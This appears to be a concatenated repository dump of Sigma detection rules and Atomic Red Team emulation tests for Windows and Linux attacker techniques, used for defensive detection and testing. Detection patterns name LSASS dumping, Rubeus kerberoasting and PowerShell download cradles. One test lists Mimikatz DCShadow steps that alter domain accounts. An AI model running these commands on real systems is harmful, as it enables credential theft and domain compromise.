5 | references:
6 | - https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation
7 | author: Markus Neis, keepwatch
8 | date: 2018/11/14
9 | tags:
10 | - attack.credential_access
11 | - attack.t1208
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection_image:
17 | Image: '*\setspn.exe'
18 | selection_desc:
19 | Description: '*Query or reset the computer* SPN attribute*'
20 | cmd:
21 | CommandLine: '*-q*'
22 | condition: (selection_image or selection_desc) and cmd
23 | falsepositives:
24 | - Administrator Activity
25 | level: medium
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_calc.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Calculator Usage
2 | id: 737e618a-a410-49b5-bec3-9e55ff7fbc15
3 | description: Detects suspicious use of calc.exe with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion
4 | status: experimental
5 | references:
6 | - https://twitter.com/ItsReallyNick/status/1094080242686312448
7 | author: Florian Roth
8 | date: 2019/02/09
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1036
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection1:
17 | CommandLine: '*\calc.exe *'
18 | selection2:
19 | Image: '*\calc.exe'
20 | filter2:
21 | Image: '*\Windows\Sys*'
22 | condition: selection1 or ( selection2 and not filter2 )
23 | falsepositives:
24 | - Unknown
25 | level: high
26 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1207.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1207
3 | display_name: DCShadow
4 |
5 | atomic_tests:
6 | - name: DCShadow - Mimikatz
7 | description: |
8 | Utilize Mimikatz DCShadow method to simulate behavior of a Domain Controller
9 |
10 | [DCShadow](https://www.dcshadow.com/)
11 | [Additional Reference](http://www.labofapenetrationtester.com/2018/04/dcshadow.html)
12 |
13 | supported_platforms:
14 | - windows
15 |
16 | executor:
17 | name: manual
18 | steps: |
19 | 1. Start Mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM.
20 | 2. Start another mimikatz with DA privileges. This is the instance which registers a DC and is used to "push" the attributes.
21 | 3. lsadump::dcshadow /object:ops-user19$ /attribute:userAccountControl /value:532480
22 | 4. lsadump::dcshadow /push
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_bear_activity_gtr19.yml:
--------------------------------------------------------------------------------
1 | title: Judgement Panda Exfil Activity
2 | id: b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee
3 | description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
4 | references:
5 | - https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/
6 | author: Florian Roth
7 | date: 2019/02/21
8 | tags:
9 | - attack.credential_access
10 | - attack.t1081
11 | - attack.t1003
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection1:
17 | Image: '*\xcopy.exe'
18 | CommandLine: '* /S /E /C /Q /H \\*'
19 | selection2:
20 | Image: '*\adexplorer.exe'
21 | CommandLine: '* -snapshot "" c:\users\\*'
22 | condition: selection1 or selection2
23 | falsepositives:
24 | - unknown
25 | level: critical
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_renamed_procdump.yml:
--------------------------------------------------------------------------------
1 | title: Renamed ProcDump
2 | id: 4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67
3 | status: experimental
4 | description: Detects the execution of a renamed ProcDump executable often used by attackers or malware
5 | references:
6 | - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
7 | author: Florian Roth
8 | date: 2019/11/18
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1036
12 | logsource:
13 | product: windows
14 | service: sysmon
15 | detection:
16 | selection:
17 | OriginalFileName: 'procdump'
18 | filter:
19 | Image:
20 | - '*\procdump.exe'
21 | - '*\procdump64.exe'
22 | condition: selection and not filter
23 | falsepositives:
24 | - Procdump illegaly bundled with legitimate software
25 | - Weird admins who renamed binaries
26 | level: critical
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_susp_image_load.yml:
--------------------------------------------------------------------------------
1 | title: Possible Process Hollowing Image Loading
2 | id: e32ce4f5-46c6-4c47-ba69-5de3c9193cd7
3 | status: experimental
4 | description: Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz
5 | references:
6 | - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html
7 | author: Markus Neis
8 | date: 2018/01/07
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1073
12 | logsource:
13 | product: windows
14 | service: sysmon
15 | detection:
16 | selection:
17 | EventID: 7
18 | Image:
19 | - '*\notepad.exe'
20 | ImageLoaded:
21 | - '*\samlib.dll'
22 | - '*\WinSCard.dll'
23 | condition: selection
24 | falsepositives:
25 | - Very likely, needs more tuning
26 | level: high
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_ntlm_auth.yml:
--------------------------------------------------------------------------------
1 | title: NTLM Logon
2 | id: 98c3bcf1-56f2-49dc-9d8d-c66cf190238b
3 | status: experimental
4 | description: Detects logons using NTLM, which could be caused by a legacy source or attackers
5 | references:
6 | - https://twitter.com/JohnLaTwC/status/1004895028995477505
7 | - https://goo.gl/PsqrhT
8 | author: Florian Roth
9 | date: 2018/06/08
10 | tags:
11 | - attack.lateral_movement
12 | - attack.t1075
13 | logsource:
14 | product: windows
15 | service: ntlm
16 | definition: Reqiures events from Microsoft-Windows-NTLM/Operational
17 | detection:
18 | selection:
19 | EventID: 8002
20 | CallingProcessName: '*' # We use this to avoid false positives with ID 8002 on other log sources if the logsource isn't set correctly
21 | condition: selection
22 | falsepositives:
23 | - Legacy hosts
24 | level: low
25 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1010.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1010
3 | display_name: Application Window Discovery
4 |
5 | atomic_tests:
6 | - name: List Process Main Windows - C# .NET
7 | description: |
8 | Compiles and executes C# code to list main window titles associated with each process.
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | input_source_code:
15 | description: Path to source of C# code
16 | type: path
17 | default: PathToAtomicsFolder\T1010\src\T1010.cs
18 | output_file_name:
19 | description: Name of output binary
20 | type: string
21 | default: T1010.exe
22 |
23 | executor:
24 | name: command_prompt
25 | elevation_required: false
26 | command: |
27 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
28 | #{output_file_name}
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_downgrade_attack.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell Downgrade Attack
2 | id: 6331d09b-4785-4c13-980f-f96661356249
3 | status: experimental
4 | description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
5 | references:
6 | - http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
7 | tags:
8 | - attack.defense_evasion
9 | - attack.execution
10 | - attack.t1086
11 | author: Florian Roth (rule), Lee Holmes (idea)
12 | logsource:
13 | product: windows
14 | service: powershell-classic
15 | detection:
16 | selection:
17 | EventID: 400
18 | EngineVersion: '2.*'
19 | filter:
20 | HostVersion: '2.*'
21 | condition: selection and not filter
22 | falsepositives:
23 | - Penetration Test
24 | - Unknown
25 | level: medium
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_script_execution.yml:
--------------------------------------------------------------------------------
1 | title: WSF/JSE/JS/VBA/VBE File Execution
2 | id: 1e33157c-53b1-41ad-bbcc-780b80b58288
3 | status: experimental
4 | description: Detects suspicious file execution by wscript and cscript
5 | author: Michael Haag
6 | tags:
7 | - attack.execution
8 | - attack.t1064
9 | logsource:
10 | category: process_creation
11 | product: windows
12 | detection:
13 | selection:
14 | Image:
15 | - '*\wscript.exe'
16 | - '*\cscript.exe'
17 | CommandLine:
18 | - '*.jse'
19 | - '*.vbe'
20 | - '*.js'
21 | - '*.vba'
22 | condition: selection
23 | fields:
24 | - CommandLine
25 | - ParentCommandLine
26 | falsepositives:
27 | - Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy.
28 | level: medium
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_lsass_memdump.yml:
--------------------------------------------------------------------------------
1 | title: LSASS Memory Dump
2 | id: 5ef9853e-4d0e-4a70-846f-a9ca37d876da
3 | status: experimental
4 | description: Detects process LSASS memory dump using procdump or taskmgr based on the CallTrace pointing to dbghelp.dll or dbgcore.dll for win10
5 | author: Samir Bousseaden
6 | references:
7 | - https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html
8 | tags:
9 | - attack.t1003
10 | - attack.s0002
11 | - attack.credential_access
12 | logsource:
13 | product: windows
14 | service: sysmon
15 | detection:
16 | selection:
17 | EventID: 10
18 | TargetImage: 'C:\windows\system32\lsass.exe'
19 | GrantedAccess: '0x1fffff'
20 | CallTrace:
21 | - '*dbghelp.dll*'
22 | - '*dbgcore.dll*'
23 | condition: selection
24 | falsepositives:
25 | - unknown
26 | level: high
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_exploit_cve_2017_0261.yml:
--------------------------------------------------------------------------------
1 | title: Exploit for CVE-2017-0261
2 | id: 864403a1-36c9-40a2-a982-4c9a45f7d833
3 | status: experimental
4 | description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
5 | references:
6 | - https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html
7 | author: Florian Roth
8 | date: 2018/02/22
9 | tags:
10 | - attack.defense_evasion
11 | - attack.privilege_escalation
12 | - attack.t1055
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | ParentImage: '*\WINWORD.EXE'
19 | Image: '*\FLTLDR.exe*'
20 | condition: selection
21 | falsepositives:
22 | - Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)
23 | level: medium
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_process_creation_bitsadmin_download.yml:
--------------------------------------------------------------------------------
1 | title: Bitsadmin Download
2 | id: d059842b-6b9d-4ed1-b5c3-5b89143c6ede
3 | status: experimental
4 | description: Detects usage of bitsadmin downloading a file
5 | references:
6 | - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
7 | - https://isc.sans.edu/diary/22264
8 | tags:
9 | - attack.defense_evasion
10 | - attack.persistence
11 | - attack.t1197
12 | - attack.s0190
13 | author: Michael Haag
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | selection:
19 | Image:
20 | - '*\bitsadmin.exe'
21 | CommandLine:
22 | - /transfer
23 | condition: selection
24 | fields:
25 | - CommandLine
26 | - ParentCommandLine
27 | falsepositives:
28 | - Some legitimate apps use this, but limited.
29 | level: medium
30 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_rottenpotato.yml:
--------------------------------------------------------------------------------
1 | title: RottenPotato Like Attack Pattern
2 | id: 16f5d8ca-44bd-47c8-acbe-6fc95a16c12f
3 | status: experimental
4 | description: Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like
5 | references:
6 | - https://twitter.com/SBousseaden/status/1195284233729777665
7 | author: "@SBousseaden, Florian Roth"
8 | date: 2019/11/15
9 | tags:
10 | - attack.privilege_escalation
11 | - attack.credential_access
12 | - attack.t1171
13 | logsource:
14 | product: windows
15 | service: security
16 | detection:
17 | selection:
18 | EventID: 4624
19 | LogonType: 3
20 | TargetUserName: 'ANONYMOUS_LOGON'
21 | WorkstationName: '-'
22 | SourceNetworkAddress: '127.0.0.1'
23 | condition: selection
24 | falsepositives:
25 | - Unknown
26 | level: high
27 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1153.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1153
3 | display_name: Source
4 |
5 | atomic_tests:
6 | - name: Execute Script using Source
7 | description: |
8 | Creates a script and executes it using the source command
9 |
10 | supported_platforms:
11 | - macos
12 | - linux
13 |
14 | executor:
15 | name: sh
16 | command: |
17 | sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
18 | chmod +x /tmp/art.sh
19 | source /tmp/art.sh
20 |
21 | - name: Execute Script using Source Alias
22 | description: |
23 | Creates a script and executes it using the source command's dot alias
24 |
25 | supported_platforms:
26 | - macos
27 | - linux
28 |
29 | executor:
30 | name: sh
31 | command: |
32 | sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
33 | chmod +x /tmp/art.sh
34 | . /tmp/art.sh
35 |
36 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1500.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1500
3 | display_name: Compile After Delivery
4 |
5 | atomic_tests:
6 | - name: Compile After Delivery using csc.exe
7 | description: |
8 | Compile C# code using csc.exe binary used by .NET
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | input_file:
15 | description: C# code that launches calc.exe from a hidden cmd.exe Window
16 | type: file
17 | default: $PathToAtomicsFolder\T1500\src\calc.cs
18 | output_file:
19 | description: Output compiled binary
20 | type: file
21 | default: C:\Windows\Temp\T1500.exe
22 |
23 | executor:
24 | name: command_prompt
25 | elevation_required: false
26 | command: |
27 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file}
28 | cleanup_command: |
29 | del #{output_file}
--------------------------------------------------------------------------------
/elemental/media/atomics/T1518.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1518
3 | display_name: Software Discovery
4 |
5 | atomic_tests:
6 | - name: Find and Display Iinternet Explorer Browser Version
7 | description: |
8 | Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | executor:
14 | name: command_prompt
15 | elevation_required: false # indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false
16 | command: | # these are the actaul attack commands, at least one command must be provided
17 | reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion
18 |
19 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_hack_smbexec.yml:
--------------------------------------------------------------------------------
1 | title: smbexec.py Service Installation
2 | id: 52a85084-6989-40c3-8f32-091e12e13f09
3 | description: Detects the use of smbexec.py tool by detecting a specific service installation
4 | author: Omer Faruk Celik
5 | date: 2018/03/20
6 | references:
7 | - https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/
8 | tags:
9 | - attack.lateral_movement
10 | - attack.execution
11 | - attack.t1077
12 | - attack.t1035
13 | logsource:
14 | product: windows
15 | service: system
16 | detection:
17 | service_installation:
18 | EventID: 7045
19 | ServiceName: 'BTOBTO'
20 | ServiceFileName: '*\execute.bat'
21 | condition: service_installation
22 | fields:
23 | - ServiceName
24 | - ServiceFileName
25 | falsepositives:
26 | - Penetration Test
27 | - Unknown
28 | level: critical
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_rdp_potential_cve-2019-0708.yml:
--------------------------------------------------------------------------------
1 | title: Potential RDP exploit CVE-2019-0708
2 | id: aaa5b30d-f418-420b-83a0-299cb6024885
3 | description: Detect suspicious error on protocol RDP, potential CVE-2019-0708
4 | references:
5 | - https://github.com/zerosum0x0/CVE-2019-0708
6 | - https://github.com/Ekultek/BlueKeep
7 | tags:
8 | - attack.initial_access
9 | - attack.lateral_movement
10 | - attack.t1210
11 | - attack.t1190
12 | - car.2013-07-002
13 | status: experimental
14 | author: "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)"
15 | logsource:
16 | product: windows
17 | service: system
18 | detection:
19 | selection:
20 | EventID:
21 | - 56
22 | - 50
23 | Source: TermDD
24 | condition: selection
25 | falsepositives:
26 | - Bad connections or network interruptions
27 | level: high
28 |
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_workflow_compiler.yml:
--------------------------------------------------------------------------------
1 | title: Microsoft Workflow Compiler
2 | id: 419dbf2b-8a9b-4bea-bf99-7544b050ec8d
3 | status: experimental
4 | description: Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
5 | tags:
6 | - attack.defense_evasion
7 | - attack.execution
8 | - attack.t1127
9 | author: Nik Seetharaman
10 | references:
11 | - https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | Image: '*\Microsoft.Workflow.Compiler.exe'
18 | condition: selection
19 | fields:
20 | - CommandLine
21 | - ParentCommandLine
22 | falsepositives:
23 | - Legitimate MWC use (unlikely in modern enterprise environments)
24 | level: high
25 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1030.md:
--------------------------------------------------------------------------------
1 | # T1030 - Data Transfer Size Limits
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1030)
3 | An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.4 | 5 | ## Atomic Tests 6 | 7 | - [Atomic Test #1 - Data Transfer Size Limits](#atomic-test-1---data-transfer-size-limits) 8 | 9 | 10 |
| 10 | {% for tactic in total_tactics %} 11 | {{ tactic.tactic_name }} 12 | {% for tech in techfortactics %} 13 | {{ tech.technique_id }} 14 | {% endfor %} 15 | | 16 |17 | {% endfor %} 18 | 19 | |
There are no Tactics for this mother.
24 | {% endif %} 25 | {% endblock %} -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_atsvc_task.yml: -------------------------------------------------------------------------------- 1 | title: Remote Task Creation via ATSVC named pipe 2 | id: f6de6525-4509-495a-8a82-1f8b0ed73a00 3 | description: Detects remote task creation via at.exe or API interacting with ATSVC namedpipe 4 | author: Samir Bousseaden 5 | references: 6 | - https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html 7 | tags: 8 | - attack.lateral_movement 9 | - attack.persistence 10 | - attack.t1053 11 | - car.2013-05-004 12 | - car.2015-04-001 13 | logsource: 14 | product: windows 15 | service: security 16 | description: 'The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure' 17 | detection: 18 | selection: 19 | EventID: 5145 20 | ShareName: \\*\IPC$ 21 | RelativeTargetName: atsvc 22 | Accesses: '*WriteData*' 23 | condition: selection 24 | falsepositives: 25 | - pentesting 26 | level: medium 27 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_overpass_the_hash.yml: -------------------------------------------------------------------------------- 1 | title: Successful Overpass the Hash Attempt 2 | id: 192a0330-c20b-4356-90b6-7b7049ae0b87 3 | status: experimental 4 | description: Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module. 5 | references: 6 | - https://cyberwardog.blogspot.de/2017/04/chronicles-of-threat-hunter-hunting-for.html 7 | author: Roberto Rodriguez (source), Dominik Schaudel (rule) 8 | date: 2018/02/12 9 | tags: 10 | - attack.lateral_movement 11 | - attack.t1075 12 | - attack.s0002 13 | logsource: 14 | product: windows 15 | service: security 16 | detection: 17 | selection: 18 | EventID: 4624 19 | LogonType: 9 20 | LogonProcessName: seclogo 21 | AuthenticationPackageName: Negotiate 22 | condition: selection 23 | falsepositives: 24 | - Runas command-line tool using /netonly parameter 25 | level: high 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_registry_persistence_key_linking.yml: -------------------------------------------------------------------------------- 1 | title: Windows Registry Persistence - COM key linking 2 | id: 9b0f8a61-91b2-464f-aceb-0527e0a45020 3 | status: experimental 4 | description: Detects COM object hijacking via TreatAs subkey 5 | references: 6 | - https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ 7 | author: Kutepov Anton, oscd.community 8 | date: 2019/10/23 9 | modified: 2019/11/07 10 | tags: 11 | - attack.persistence 12 | - attack.t1122 13 | logsource: 14 | product: windows 15 | service: sysmon 16 | detection: 17 | selection: 18 | EventID: 12 19 | TargetObject|startswith: 'HKU\' 20 | TargetObject|contains: '_Classes\CLSID\' 21 | TargetObject|endswith: '\TreatAs' 22 | condition: selection 23 | falsepositives: 24 | - Maybe some system utilities in rare cases use linking keys for backward compability 25 | level: medium 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/web_cve_2018_2894_weblogic_exploit.yml: -------------------------------------------------------------------------------- 1 | title: Oracle WebLogic Exploit 2 | id: 37e8369b-43bb-4bf8-83b6-6dd43bda2000 3 | description: Detects access to a webshell droped into a keytore folder on the WebLogic server 4 | author: Florian Roth 5 | date: 2018/07/22 6 | status: experimental 7 | references: 8 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2894 9 | - https://twitter.com/pyn3rd/status/1020620932967223296 10 | - https://github.com/LandGrey/CVE-2018-2894 11 | logsource: 12 | category: webserver 13 | detection: 14 | selection: 15 | c-uri-path: 16 | - '*/config/keystore/*.js*' 17 | condition: selection 18 | fields: 19 | - c-ip 20 | - c-dns 21 | falsepositives: 22 | - Unknown 23 | tags: 24 | - attack.t1100 25 | - attack.t1190 26 | - attack.initial_access 27 | - attack.persistence 28 | - attack.privilege_escalation 29 | - cve.2018-2894 30 | level: critical 31 | 32 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_powershell_dll_execution.yml: -------------------------------------------------------------------------------- 1 | title: Detection of PowerShell Execution via DLL 2 | id: 6812a10b-60ea-420c-832f-dfcc33b646ba 3 | status: experimental 4 | description: Detects PowerShell Strings applied to rundllas seen in PowerShdll.dll 5 | references: 6 | - https://github.com/p3nt4/PowerShdll/blob/master/README.md 7 | tags: 8 | - attack.execution 9 | - attack.t1086 10 | - car.2014-04-003 11 | author: Markus Neis 12 | date: 2018/08/25 13 | logsource: 14 | category: process_creation 15 | product: windows 16 | detection: 17 | selection1: 18 | Image: 19 | - '*\rundll32.exe' 20 | selection2: 21 | Description: 22 | - '*Windows-Hostprozess (Rundll32)*' 23 | selection3: 24 | CommandLine: 25 | - '*Default.GetString*' 26 | - '*FromBase64String*' 27 | condition: (selection1 or selection2) and selection3 28 | falsepositives: 29 | - Unknown 30 | level: high 31 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_devtoolslauncher.yml: -------------------------------------------------------------------------------- 1 | title: Devtoolslauncher.exe executes specified binary 2 | id: cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6 3 | status: experimental 4 | description: The Devtoolslauncher.exe executes other binary 5 | references: 6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Devtoolslauncher.yml 7 | - https://twitter.com/_felamos/status/1179811992841797632 8 | author: Beyu Denis, oscd.community (rule), @_felamos (idea) 9 | date: 2019/10/12 10 | modified: 2019/11/04 11 | tags: 12 | - attack.defense_evasion 13 | - attack.execution 14 | - attack.t1218 15 | level: critical 16 | logsource: 17 | category: process_creation 18 | product: windows 19 | detection: 20 | selection: 21 | Image|endswith: '\devtoolslauncher.exe' 22 | CommandLine|contains: 'LaunchForDeploy' 23 | condition: selection 24 | falsepositives: 25 | - Legitimate use of devtoolslauncher.exe by legitimate user 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_hack_rubeus.yml: -------------------------------------------------------------------------------- 1 | title: Rubeus Hack Tool 2 | id: 7ec2c172-dceb-4c10-92c9-87c1881b7e18 3 | description: Detects command line parameters used by Rubeus hack tool 4 | author: Florian Roth 5 | references: 6 | - https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/ 7 | date: 2018/12/19 8 | tags: 9 | - attack.credential_access 10 | - attack.t1003 11 | - attack.s0005 12 | logsource: 13 | category: process_creation 14 | product: windows 15 | detection: 16 | selection: 17 | CommandLine: 18 | - '* asreproast *' 19 | - '* dump /service:krbtgt *' 20 | - '* kerberoast *' 21 | - '* createnetonly /program:*' 22 | - '* ptt /ticket:*' 23 | - '* /impersonateuser:*' 24 | - '* renew /ticket:*' 25 | - '* asktgt /user:*' 26 | - '* harvest /interval:*' 27 | condition: selection 28 | falsepositives: 29 | - unlikely 30 | level: critical 31 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/apt_babyshark.yml: -------------------------------------------------------------------------------- 1 | title: Baby Shark Activity 2 | id: 2b30fa36-3a18-402f-a22d-bf4ce2189f35 3 | status: experimental 4 | description: Detects activity that could be related to Baby Shark malware 5 | references: 6 | - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/ 7 | tags: 8 | - attack.execution 9 | - attack.t1059 10 | - attack.t1086 11 | - attack.discovery 12 | - attack.t1012 13 | - attack.defense_evasion 14 | - attack.t1170 15 | logsource: 16 | category: process_creation 17 | product: windows 18 | author: Florian Roth 19 | date: 2019/02/24 20 | detection: 21 | selection: 22 | CommandLine: 23 | - reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 24 | - powershell.exe mshta.exe http* 25 | - cmd.exe /c taskkill /im cmd.exe 26 | condition: selection 27 | falsepositives: 28 | - unknown 29 | level: high 30 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_rundll32_by_ordinal.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Call by Ordinal 2 | id: e79a9e79-eb72-4e78-a628-0e7e8f59e89c 3 | description: Detects suspicious calls of DLLs in rundll32.dll exports by ordinal 4 | status: experimental 5 | references: 6 | - https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/ 7 | - https://github.com/Neo23x0/DLLRunner 8 | - https://twitter.com/cyb3rops/status/1186631731543236608 9 | tags: 10 | - attack.defense_evasion 11 | - attack.execution 12 | - attack.t1085 13 | author: Florian Roth 14 | date: 2019/10/22 15 | logsource: 16 | category: process_creation 17 | product: windows 18 | detection: 19 | selection: 20 | CommandLine: '*\rundll32.exe *,#*' 21 | condition: selection 22 | falsepositives: 23 | - False positives depend on scripts and administrative tools used in the monitored environment 24 | - Windows contol panel elements have been identified as source (mmc) 25 | level: high 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/proxy_raw_paste_service_access.yml: -------------------------------------------------------------------------------- 1 | title: Raw Paste Service Access 2 | id: 5468045b-4fcc-4d1a-973c-c9c9578edacb 3 | status: experimental 4 | description: Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form 5 | references: 6 | - https://www.virustotal.com/gui/domain/paste.ee/relations 7 | author: Florian Roth 8 | date: 2019/12/05 9 | tags: 10 | - attack.t1102 11 | - attack.defense_evasion 12 | logsource: 13 | category: proxy 14 | detection: 15 | selection: 16 | c-uri|contains: 17 | - '.paste.ee/r/' 18 | - '.pastebin.com/raw/' 19 | - '.hastebin.com/raw/' 20 | condition: selection 21 | fields: 22 | - ClientIP 23 | - c-uri 24 | - c-useragent 25 | falsepositives: 26 | - User activity (e.g. developer that shared and copied code snippets and used the raw link instead of just copy & paste) 27 | level: high 28 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_susp_download_run_key.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious RUN Key from Download 2 | id: 9c5037d1-c568-49b3-88c7-9846a5bdc2be 3 | status: experimental 4 | description: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories 5 | references: 6 | - https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/ 7 | author: Florian Roth 8 | date: 2019/10/01 9 | tags: 10 | - attack.persistence 11 | - attack.t1060 12 | logsource: 13 | product: windows 14 | service: sysmon 15 | detection: 16 | selection: 17 | EventID: 13 18 | Image: 19 | - '*\Downloads\\*' 20 | - '*\Temporary Internet Files\Content.Outlook\\*' 21 | - '*\Local Settings\Temporary Internet Files\\*' 22 | TargetObject: '*\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\*' 23 | condition: selection 24 | falsepositives: 25 | - Software installers downloaded and used by users 26 | level: high -------------------------------------------------------------------------------- /elemental/media/sigma_rules/powershell_suspicious_invocation_specific.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious PowerShell Invocations - Specific 2 | id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c 3 | status: experimental 4 | description: Detects suspicious PowerShell invocation command parameters 5 | tags: 6 | - attack.execution 7 | - attack.t1086 8 | author: Florian Roth (rule) 9 | logsource: 10 | product: windows 11 | service: powershell 12 | detection: 13 | keywords: 14 | Message: 15 | - '* -nop -w hidden -c * [Convert]::FromBase64String*' 16 | - '* -w hidden -noni -nop -c "iex(New-Object*' 17 | - '* -w hidden -ep bypass -Enc*' 18 | - '*powershell.exe reg add HKCU\software\microsoft\windows\currentversion\run*' 19 | - '*bypass -noprofile -windowstyle hidden (new-object system.net.webclient).download*' 20 | - '*iex(New-Object Net.WebClient).Download*' 21 | condition: keywords 22 | falsepositives: 23 | - Penetration tests 24 | level: high 25 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_win_binary_susp_com.yml: -------------------------------------------------------------------------------- 1 | title: Microsoft Binary Suspicious Communication Endpoint 2 | id: e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97 3 | status: experimental 4 | description: Detects an executable in the Windows folder accessing suspicious domains 5 | references: 6 | - https://twitter.com/M_haggis/status/900741347035889665 7 | - https://twitter.com/M_haggis/status/1032799638213066752 8 | author: Florian Roth 9 | date: 2018/08/30 10 | tags: 11 | - attack.lateral_movement 12 | - attack.t1105 13 | logsource: 14 | product: windows 15 | 